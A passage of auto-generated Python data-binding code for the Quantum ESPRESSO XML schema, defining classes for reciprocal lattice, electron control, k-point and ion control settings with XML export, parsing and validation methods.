showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='reciprocal_latticeType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespaceprefix_='qes:', name_='reciprocal_latticeType', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='qes:', name_='reciprocal_latticeType'):
pass
def exportChildren(self, outfile, level, namespaceprefix_='qes:', name_='reciprocal_latticeType', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.b1 is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:b1>%s</qes:b1>%s' % (self.gds_format_double_list(self.b1, input_name='b1'), eol_))
if self.b2 is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:b2>%s</qes:b2>%s' % (self.gds_format_double_list(self.b2, input_name='b2'), eol_))
if self.b3 is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:b3>%s</qes:b3>%s' % (self.gds_format_double_list(self.b3, input_name='b3'), eol_))
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'b1':
b1_ = child_.text
b1_ = self.gds_validate_double_list(b1_, node, 'b1')
self.b1 = b1_
# validate type d3vectorType
self.validate_d3vectorType(self.b1)
elif nodeName_ == 'b2':
b2_ = child_.text
b2_ = self.gds_validate_double_list(b2_, node, 'b2')
self.b2 = b2_
# validate type d3vectorType
self.validate_d3vectorType(self.b2)
elif nodeName_ == 'b3':
b3_ = child_.text
b3_ = self.gds_validate_double_list(b3_, node, 'b3')
self.b3 = b3_
# validate type d3vectorType
self.validate_d3vectorType(self.b3)
# end class reciprocal_latticeType
class electron_controlType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, diagonalization=None, mixing_mode=None, mixing_beta=None, conv_thr=None, mixing_ndim=None, max_nstep=None, real_space_q=None, tq_smoothing=None, tbeta_smoothing=None, diago_thr_init=None, diago_full_acc=None, diago_cg_maxiter=None, diago_david_ndim=None):
self.original_tagname_ = None
self.diagonalization = diagonalization
self.validate_diagoType(self.diagonalization)
self.mixing_mode = mixing_mode
self.validate_mixingModeType(self.mixing_mode)
self.mixing_beta = mixing_beta
self.conv_thr = conv_thr
self.mixing_ndim = mixing_ndim
self.max_nstep = max_nstep
self.real_space_q = real_space_q
self.tq_smoothing = tq_smoothing
self.tbeta_smoothing = tbeta_smoothing
self.diago_thr_init = diago_thr_init
self.diago_full_acc = diago_full_acc
self.diago_cg_maxiter = diago_cg_maxiter
self.diago_david_ndim = diago_david_ndim
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, electron_controlType)
if subclass is not None:
return subclass(*args_, **kwargs_)
if electron_controlType.subclass:
return electron_controlType.subclass(*args_, **kwargs_)
else:
return electron_controlType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_diagonalization(self): return self.diagonalization
def set_diagonalization(self, diagonalization): self.diagonalization = diagonalization
def get_mixing_mode(self): return self.mixing_mode
def set_mixing_mode(self, mixing_mode): self.mixing_mode = mixing_mode
def get_mixing_beta(self): return self.mixing_beta
def set_mixing_beta(self, mixing_beta): self.mixing_beta = mixing_beta
def get_conv_thr(self): return self.conv_thr
def set_conv_thr(self, conv_thr): self.conv_thr = conv_thr
def get_mixing_ndim(self): return self.mixing_ndim
def set_mixing_ndim(self, mixing_ndim): self.mixing_ndim = mixing_ndim
def get_max_nstep(self): return self.max_nstep
def set_max_nstep(self, max_nstep): self.max_nstep = max_nstep
def get_real_space_q(self): return self.real_space_q
def set_real_space_q(self, real_space_q): self.real_space_q = real_space_q
def get_tq_smoothing(self): return self.tq_smoothing
def set_tq_smoothing(self, tq_smoothing): self.tq_smoothing = tq_smoothing
def get_tbeta_smoothing(self): return self.tbeta_smoothing
def set_tbeta_smoothing(self, tbeta_smoothing): self.tbeta_smoothing = tbeta_smoothing
def get_diago_thr_init(self): return self.diago_thr_init
def set_diago_thr_init(self, diago_thr_init): self.diago_thr_init = diago_thr_init
def get_diago_full_acc(self): return self.diago_full_acc
def set_diago_full_acc(self, diago_full_acc): self.diago_full_acc = diago_full_acc
def get_diago_cg_maxiter(self): return self.diago_cg_maxiter
def set_diago_cg_maxiter(self, diago_cg_maxiter): self.diago_cg_maxiter = diago_cg_maxiter
def get_diago_david_ndim(self): return self.diago_david_ndim
def set_diago_david_ndim(self, diago_david_ndim): self.diago_david_ndim = diago_david_ndim
def validate_diagoType(self, value):
# Validate type diagoType, a restriction on string.
if value is not None and Validate_simpletypes_:
value = str(value)
enumerations = ['davidson', 'cg']
enumeration_respectee = False
for enum in enumerations:
if value == enum:
enumeration_respectee = True
break
if not enumeration_respectee:
warnings_.warn('Value "%(value)s" does not match xsd enumeration restriction on diagoType' % {"value" : value.encode("utf-8")} )
def validate_mixingModeType(self, value):
# Validate type mixingModeType, a restriction on string.
if value is not None and Validate_simpletypes_:
value = str(value)
enumerations = ['plain', 'TF', 'local-TF']
enumeration_respectee = False
for enum in enumerations:
if value == enum:
enumeration_respectee = True
break
if not enumeration_respectee:
warnings_.warn('Value "%(value)s" does not match xsd enumeration restriction on mixingModeType' % {"value" : value.encode("utf-8")} )
def hasContent_(self):
if (
self.diagonalization is not None or
self.mixing_mode is not None or
self.mixing_beta is not None or
self.conv_thr is not None or
self.mixing_ndim is not None or
self.max_nstep is not None or
self.real_space_q is not None or
self.tq_smoothing is not None or
self.tbeta_smoothing is not None or
self.diago_thr_init is not None or
self.diago_full_acc is not None or
self.diago_cg_maxiter is not None or
self.diago_david_ndim is not None
):
return True
else:
return False
def export(self, outfile, level, namespaceprefix_='qes:', name_='electron_controlType', namespacedef_='xmlns:qes="http://www.quantum-espresso.org/ns/qes/qes-1.0"', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('electron_controlType')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='electron_controlType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespaceprefix_='qes:', name_='electron_controlType', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='qes:', name_='electron_controlType'):
pass
def exportChildren(self, outfile, level, namespaceprefix_='qes:', name_='electron_controlType', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.diagonalization is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:diagonalization>%s</qes:diagonalization>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.diagonalization), input_name='diagonalization')), eol_))
if self.mixing_mode is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:mixing_mode>%s</qes:mixing_mode>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.mixing_mode), input_name='mixing_mode')), eol_))
if self.mixing_beta is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:mixing_beta>%s</qes:mixing_beta>%s' % (self.gds_format_double(self.mixing_beta, input_name='mixing_beta'), eol_))
if self.conv_thr is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:conv_thr>%s</qes:conv_thr>%s' % (self.gds_format_double(self.conv_thr, input_name='conv_thr'), eol_))
if self.mixing_ndim is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:mixing_ndim>%s</qes:mixing_ndim>%s' % (self.gds_format_integer(self.mixing_ndim, input_name='mixing_ndim'), eol_))
if self.max_nstep is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:max_nstep>%s</qes:max_nstep>%s' % (self.gds_format_integer(self.max_nstep, input_name='max_nstep'), eol_))
if self.real_space_q is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:real_space_q>%s</qes:real_space_q>%s' % (self.gds_format_boolean(self.real_space_q, input_name='real_space_q'), eol_))
if self.tq_smoothing is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:tq_smoothing>%s</qes:tq_smoothing>%s' % (self.gds_format_boolean(self.tq_smoothing, input_name='tq_smoothing'), eol_))
if self.tbeta_smoothing is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:tbeta_smoothing>%s</qes:tbeta_smoothing>%s' % (self.gds_format_boolean(self.tbeta_smoothing, input_name='tbeta_smoothing'), eol_))
if self.diago_thr_init is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:diago_thr_init>%s</qes:diago_thr_init>%s' % (self.gds_format_double(self.diago_thr_init, input_name='diago_thr_init'), eol_))
if self.diago_full_acc is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:diago_full_acc>%s</qes:diago_full_acc>%s' % (self.gds_format_boolean(self.diago_full_acc, input_name='diago_full_acc'), eol_))
if self.diago_cg_maxiter is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:diago_cg_maxiter>%s</qes:diago_cg_maxiter>%s' % (self.gds_format_integer(self.diago_cg_maxiter, input_name='diago_cg_maxiter'), eol_))
if self.diago_david_ndim is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:diago_david_ndim>%s</qes:diago_david_ndim>%s' % (self.gds_format_integer(self.diago_david_ndim, input_name='diago_david_ndim'), eol_))
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'diagonalization':
diagonalization_ = child_.text
diagonalization_ = self.gds_validate_string(diagonalization_, node, 'diagonalization')
self.diagonalization = diagonalization_
# validate type diagoType
self.validate_diagoType(self.diagonalization)
elif nodeName_ == 'mixing_mode':
mixing_mode_ = child_.text
mixing_mode_ = self.gds_validate_string(mixing_mode_, node, 'mixing_mode')
self.mixing_mode = mixing_mode_
# validate type mixingModeType
self.validate_mixingModeType(self.mixing_mode)
elif nodeName_ == 'mixing_beta' and child_.text:
sval_ = child_.text
try:
fval_ = float(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires float or double: %s' % exp)
fval_ = self.gds_validate_float(fval_, node, 'mixing_beta')
self.mixing_beta = fval_
elif nodeName_ == 'conv_thr' and child_.text:
sval_ = child_.text
try:
fval_ = float(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires float or double: %s' % exp)
fval_ = self.gds_validate_float(fval_, node, 'conv_thr')
self.conv_thr = fval_
elif nodeName_ == 'mixing_ndim' and child_.text:
sval_ = child_.text
try:
ival_ = int(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires integer: %s' % exp)
if ival_ <= 0:
raise_parse_error(child_, 'requires positiveInteger')
ival_ = self.gds_validate_integer(ival_, node, 'mixing_ndim')
self.mixing_ndim = ival_
elif nodeName_ == 'max_nstep' and child_.text:
sval_ = child_.text
try:
ival_ = int(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires integer: %s' % exp)
if ival_ <= 0:
raise_parse_error(child_, 'requires positiveInteger')
ival_ = self.gds_validate_integer(ival_, node, 'max_nstep')
self.max_nstep = ival_
elif nodeName_ == 'real_space_q':
sval_ = child_.text
if sval_ in ('true', '1'):
ival_ = True
elif sval_ in ('false', '0'):
ival_ = False
else:
raise_parse_error(child_, 'requires boolean')
ival_ = self.gds_validate_boolean(ival_, node, 'real_space_q')
self.real_space_q = ival_
elif nodeName_ == 'tq_smoothing':
sval_ = child_.text
if sval_ in ('true', '1'):
ival_ = True
elif sval_ in ('false', '0'):
ival_ = False
else:
raise_parse_error(child_, 'requires boolean')
ival_ = self.gds_validate_boolean(ival_, node, 'tq_smoothing')
self.tq_smoothing = ival_
elif nodeName_ == 'tbeta_smoothing':
sval_ = child_.text
if sval_ in ('true', '1'):
ival_ = True
elif sval_ in ('false', '0'):
ival_ = False
else:
raise_parse_error(child_, 'requires boolean')
ival_ = self.gds_validate_boolean(ival_, node, 'tbeta_smoothing')
self.tbeta_smoothing = ival_
elif nodeName_ == 'diago_thr_init' and child_.text:
sval_ = child_.text
try:
fval_ = float(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires float or double: %s' % exp)
fval_ = self.gds_validate_float(fval_, node, 'diago_thr_init')
self.diago_thr_init = fval_
elif nodeName_ == 'diago_full_acc':
sval_ = child_.text
if sval_ in ('true', '1'):
ival_ = True
elif sval_ in ('false', '0'):
ival_ = False
else:
raise_parse_error(child_, 'requires boolean')
ival_ = self.gds_validate_boolean(ival_, node, 'diago_full_acc')
self.diago_full_acc = ival_
elif nodeName_ == 'diago_cg_maxiter' and child_.text:
sval_ = child_.text
try:
ival_ = int(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires integer: %s' % exp)
if ival_ < 0:
raise_parse_error(child_, 'requires nonNegativeInteger')
ival_ = self.gds_validate_integer(ival_, node, 'diago_cg_maxiter')
self.diago_cg_maxiter = ival_
elif nodeName_ == 'diago_david_ndim' and child_.text:
sval_ = child_.text
try:
ival_ = int(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires integer: %s' % exp)
if ival_ <= 0:
raise_parse_error(child_, 'requires positiveInteger')
ival_ = self.gds_validate_integer(ival_, node, 'diago_david_ndim')
self.diago_david_ndim = ival_
# end class electron_controlType
class k_points_IBZType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, monkhorst_pack=None, nk=None, k_point=None):
self.original_tagname_ = None
self.monkhorst_pack = monkhorst_pack
self.nk = nk
if k_point is None:
self.k_point = []
else:
self.k_point = k_point
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, k_points_IBZType)
if subclass is not None:
return subclass(*args_, **kwargs_)
if k_points_IBZType.subclass:
return k_points_IBZType.subclass(*args_, **kwargs_)
else:
return k_points_IBZType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_monkhorst_pack(self): return self.monkhorst_pack
def set_monkhorst_pack(self, monkhorst_pack): self.monkhorst_pack = monkhorst_pack
def get_nk(self): return self.nk
def set_nk(self, nk): self.nk = nk
def get_k_point(self): return self.k_point
def set_k_point(self, k_point): self.k_point = k_point
def add_k_point(self, value): self.k_point.append(value)
def insert_k_point_at(self, index, value): self.k_point.insert(index, value)
def replace_k_point_at(self, index, value): self.k_point[index] = value
def hasContent_(self):
if (
self.monkhorst_pack is not None or
self.nk is not None or
self.k_point
):
return True
else:
return False
def export(self, outfile, level, namespaceprefix_='qes:', name_='k_points_IBZType', namespacedef_='xmlns:qes="http://www.quantum-espresso.org/ns/qes/qes-1.0"', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('k_points_IBZType')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='k_points_IBZType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespaceprefix_='qes:', name_='k_points_IBZType', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='qes:', name_='k_points_IBZType'):
pass
def exportChildren(self, outfile, level, namespaceprefix_='qes:', name_='k_points_IBZType', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.monkhorst_pack is not None:
self.monkhorst_pack.export(outfile, level, namespaceprefix_, name_='monkhorst_pack', pretty_print=pretty_print)
if self.nk is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:nk>%s</qes:nk>%s' % (self.gds_format_integer(self.nk, input_name='nk'), eol_))
for k_point_ in self.k_point:
k_point_.export(outfile, level, namespaceprefix_, name_='k_point', pretty_print=pretty_print)
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'monkhorst_pack':
obj_ = monkhorst_packType.factory()
obj_.build(child_)
self.monkhorst_pack = obj_
obj_.original_tagname_ = 'monkhorst_pack'
elif nodeName_ == 'nk' and child_.text:
sval_ = child_.text
try:
ival_ = int(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires integer: %s' % exp)
if ival_ <= 0:
raise_parse_error(child_, 'requires positiveInteger')
ival_ = self.gds_validate_integer(ival_, node, 'nk')
self.nk = ival_
elif nodeName_ == 'k_point':
obj_ = k_pointType.factory()
obj_.build(child_)
self.k_point.append(obj_)
obj_.original_tagname_ = 'k_point'
# end class k_points_IBZType
class monkhorst_packType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, nk1=None, nk2=None, nk3=None, k1=None, k2=None, k3=None, valueOf_=None):
self.original_tagname_ = None
self.nk1 = _cast(int, nk1)
self.nk2 = _cast(int, nk2)
self.nk3 = _cast(int, nk3)
self.k1 = _cast(int, k1)
self.k2 = _cast(int, k2)
self.k3 = _cast(int, k3)
self.valueOf_ = valueOf_
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, monkhorst_packType)
if subclass is not None:
return subclass(*args_, **kwargs_)
if monkhorst_packType.subclass:
return monkhorst_packType.subclass(*args_, **kwargs_)
else:
return monkhorst_packType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_nk1(self): return self.nk1
def set_nk1(self, nk1): self.nk1 = nk1
def get_nk2(self): return self.nk2
def set_nk2(self, nk2): self.nk2 = nk2
def get_nk3(self): return self.nk3
def set_nk3(self, nk3): self.nk3 = nk3
def get_k1(self): return self.k1
def set_k1(self, k1): self.k1 = k1
def get_k2(self): return self.k2
def set_k2(self, k2): self.k2 = k2
def get_k3(self): return self.k3
def set_k3(self, k3): self.k3 = k3
def get_valueOf_(self): return self.valueOf_
def set_valueOf_(self, valueOf_): self.valueOf_ = valueOf_
def hasContent_(self):
if (
(1 if type(self.valueOf_) in [int,float] else self.valueOf_)
):
return True
else:
return False
def export(self, outfile, level, namespaceprefix_='qes:', name_='monkhorst_packType', namespacedef_='xmlns:qes="http://www.quantum-espresso.org/ns/qes/qes-1.0"', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('monkhorst_packType')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='monkhorst_packType')
if self.hasContent_():
outfile.write('>')
outfile.write(self.convert_unicode(self.valueOf_))
self.exportChildren(outfile, level + 1, namespaceprefix_='qes:', name_='monkhorst_packType', pretty_print=pretty_print)
outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='qes:', name_='monkhorst_packType'):
if self.nk1 is not None and 'nk1' not in already_processed:
already_processed.add('nk1')
outfile.write(' nk1="%s"' % self.gds_format_integer(self.nk1, input_name='nk1'))
if self.nk2 is not None and 'nk2' not in already_processed:
already_processed.add('nk2')
outfile.write(' nk2="%s"' % self.gds_format_integer(self.nk2, input_name='nk2'))
if self.nk3 is not None and 'nk3' not in already_processed:
already_processed.add('nk3')
outfile.write(' nk3="%s"' % self.gds_format_integer(self.nk3, input_name='nk3'))
if self.k1 is not None and 'k1' not in already_processed:
already_processed.add('k1')
outfile.write(' k1="%s"' % self.gds_format_integer(self.k1, input_name='k1'))
if self.k2 is not None and 'k2' not in already_processed:
already_processed.add('k2')
outfile.write(' k2="%s"' % self.gds_format_integer(self.k2, input_name='k2'))
if self.k3 is not None and 'k3' not in already_processed:
already_processed.add('k3')
outfile.write(' k3="%s"' % self.gds_format_integer(self.k3, input_name='k3'))
def exportChildren(self, outfile, level, namespaceprefix_='qes:', name_='monkhorst_packType', fromsubclass_=False, pretty_print=True):
pass
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
self.valueOf_ = get_all_text_(node)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('nk1', node)
if value is not None and 'nk1' not in already_processed:
already_processed.add('nk1')
try:
self.nk1 = int(value)
except ValueError as exp:
raise_parse_error(node, 'Bad integer attribute: %s' % exp)
if self.nk1 <= 0:
raise_parse_error(node, 'Invalid PositiveInteger')
value = find_attr_value_('nk2', node)
if value is not None and 'nk2' not in already_processed:
already_processed.add('nk2')
try:
self.nk2 = int(value)
except ValueError as exp:
raise_parse_error(node, 'Bad integer attribute: %s' % exp)
if self.nk2 <= 0:
raise_parse_error(node, 'Invalid PositiveInteger')
value = find_attr_value_('nk3', node)
if value is not None and 'nk3' not in already_processed:
already_processed.add('nk3')
try:
self.nk3 = int(value)
except ValueError as exp:
raise_parse_error(node, 'Bad integer attribute: %s' % exp)
if self.nk3 <= 0:
raise_parse_error(node, 'Invalid PositiveInteger')
value = find_attr_value_('k1', node)
if value is not None and 'k1' not in already_processed:
already_processed.add('k1')
try:
self.k1 = int(value)
except ValueError as exp:
raise_parse_error(node, 'Bad integer attribute: %s' % exp)
if self.k1 < 0:
raise_parse_error(node, 'Invalid NonNegativeInteger')
value = find_attr_value_('k2', node)
if value is not None and 'k2' not in already_processed:
already_processed.add('k2')
try:
self.k2 = int(value)
except ValueError as exp:
raise_parse_error(node, 'Bad integer attribute: %s' % exp)
if self.k2 < 0:
raise_parse_error(node, 'Invalid NonNegativeInteger')
value = find_attr_value_('k3', node)
if value is not None and 'k3' not in already_processed:
already_processed.add('k3')
try:
self.k3 = int(value)
except ValueError as exp:
raise_parse_error(node, 'Bad integer attribute: %s' % exp)
if self.k3 < 0:
raise_parse_error(node, 'Invalid NonNegativeInteger')
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
pass
# end class monkhorst_packType
class k_pointType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, weight=None, label=None, valueOf_=None):
self.original_tagname_ = None
self.weight = _cast(float, weight)
self.label = _cast(None, label)
self.valueOf_ = valueOf_
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, k_pointType)
if subclass is not None:
return subclass(*args_, **kwargs_)
if k_pointType.subclass:
return k_pointType.subclass(*args_, **kwargs_)
else:
return k_pointType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_weight(self): return self.weight
def set_weight(self, weight): self.weight = weight
def get_label(self): return self.label
def set_label(self, label): self.label = label
def get_valueOf_(self): return self.valueOf_
def set_valueOf_(self, valueOf_): self.valueOf_ = valueOf_
def hasContent_(self):
if (
(1 if type(self.valueOf_) in [int,float] else self.valueOf_)
):
return True
else:
return False
def export(self, outfile, level, namespaceprefix_='qes:', name_='k_pointType', namespacedef_='xmlns:qes="http://www.quantum-espresso.org/ns/qes/qes-1.0"', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('k_pointType')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='k_pointType')
if self.hasContent_():
outfile.write('>')
outfile.write(self.convert_unicode(self.valueOf_))
self.exportChildren(outfile, level + 1, namespaceprefix_='qes:', name_='k_pointType', pretty_print=pretty_print)
outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='qes:', name_='k_pointType'):
if self.weight is not None and 'weight' not in already_processed:
already_processed.add('weight')
outfile.write(' weight="%s"' % self.gds_format_double(self.weight, input_name='weight'))
if self.label is not None and 'label' not in already_processed:
already_processed.add('label')
outfile.write(' label=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.label), input_name='label')), ))
def exportChildren(self, outfile, level, namespaceprefix_='qes:', name_='k_pointType', fromsubclass_=False, pretty_print=True):
pass
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
self.valueOf_ = get_all_text_(node)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('weight', node)
if value is not None and 'weight' not in already_processed:
already_processed.add('weight')
try:
self.weight = float(value)
except ValueError as exp:
raise ValueError('Bad float/double attribute (weight): %s' % exp)
value = find_attr_value_('label', node)
if value is not None and 'label' not in already_processed:
already_processed.add('label')
self.label = value
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
pass
# end class k_pointType
class ion_controlType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, ion_dynamics=None, upscale=None, remove_rigid_rot=None, refold_pos=None, bfgs=None, md=None):
self.original_tagname_ = None
self.ion_dynamics = ion_dynamics
self.upscale = upscale
self.remove_rigid_rot = remove_rigid_rot
self.refold_pos = refold_pos
self.bfgs = bfgs
self.md = md
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, ion_controlType)
if subclass is not None:
return subclass(*args_, **kwargs_)
if ion_controlType.subclass:
return ion_controlType.subclass(*args_, **kwargs_)
else:
return ion_controlType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_ion_dynamics(self): return self.ion_dynamics
def set_ion_dynamics(self, ion_dynamics): self.ion_dynamics = ion_dynamics
def get_upscale(self): return self.upscale
def set_upscale(self, upscale): self.upscale = upscale
def get_remove_rigid_rot(self): return self.remove_rigid_rot
def set_remove_rigid_rot(self, remove_rigid_rot): self.remove_rigid_rot = remove_rigid_rot
def get_refold_pos(self): return self.refold_pos
def set_refold_pos(self, refold_pos): self.refold_pos = refold_pos
def get_bfgs(self): return self.bfgs
def set_bfgs(self, bfgs): self.bfgs = bfgs
def get_md(self): return self.md
def set_md(self, md): self.md = md
def hasContent_(self):
if (
self.ion_dynamics is not None or
self.upscale is not None or
self.remove_rigid_rot is not None or
self.refold_pos is not None or
self.bfgs is not None or
self.md is not None
):
return True
else:
return False
def export(self, outfile, level, namespaceprefix_='qes:', name_='ion_controlType', namespacedef_='xmlns:qes="http://www.quantum-espresso.org/ns/qes/qes-1.0"', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('ion_controlType')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='ion_controlType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespaceprefix_='qes:', name_='ion_controlType', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='qes:', name_='ion_controlType'):
pass
def exportChildren(self, outfile, level, namespaceprefix_='qes:', name_='ion_controlType', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.ion_dynamics is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<qes:ion_dynamics>%s</qes:ion_dynamics>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.ion_dynamics), input_name='ion_dynamics')), eol_))
if self.upscale is not None:
showIndent(outfile, level, pretty_print)
